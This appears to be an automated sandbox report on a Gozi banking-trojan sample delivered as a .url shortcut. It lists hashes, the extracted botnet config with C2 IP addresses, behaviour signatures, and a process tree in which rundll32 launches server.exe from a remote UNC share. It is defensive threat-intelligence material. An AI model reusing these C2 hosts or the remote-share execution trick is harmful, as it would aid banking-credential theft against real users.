Analysis

  • max time kernel
    144s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22/03/2023, 07:23

General

  • Target

    Documenti/Documenti.url

  • Size

    194B

  • MD5

    1b6b88b4f8da87f1524d77166c9a01dd

  • SHA1

    a4abf24eda19bf997e2de103c6d0cb3675f225e0

  • SHA256

    5ed9e8b1e7ca4c6ecce0929514d0f195d4202809a3e933e06f2af0f7eba53d8b

  • SHA512

    5de1d7a44aa0cea83bc48feaadb712779f1971878d839ab0cf1c310cc40391ea0c6660a939a90c94a1d1f4f5a465bbd746533c3f34b68f2bde5a8d0ed883d04d

Malware Config

Extracted

Family

gozi

Botnet

7715

C2

checklist.skype.com

62.173.142.50

31.41.44.87

109.248.11.217

212.109.218.151

5.44.45.83

62.173.142.81

193.233.175.113

109.248.11.184

212.109.218.26

185.68.93.7

Attributes
  • base_path

    /drew/

  • build

    250255

  • exe_type

    loader

  • extension

    .jlk

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi

Signatures

  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\rundll32.exe
    "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Documenti\Documenti.url
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1560
    • \??\UNC\109.248.11.226\Agenzia\server.exe
      "\\109.248.11.226\Agenzia\server.exe"
      2⤵
        PID:2560

    Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • memory/2560-134-0x0000000000650000-0x000000000065B000-memory.dmp

            Filesize

            44KB

          • memory/2560-135-0x00000000006B0000-0x00000000006BD000-memory.dmp

            Filesize

            52KB

          • memory/2560-138-0x0000000000400000-0x00000000004DB000-memory.dmp

            Filesize

            876KB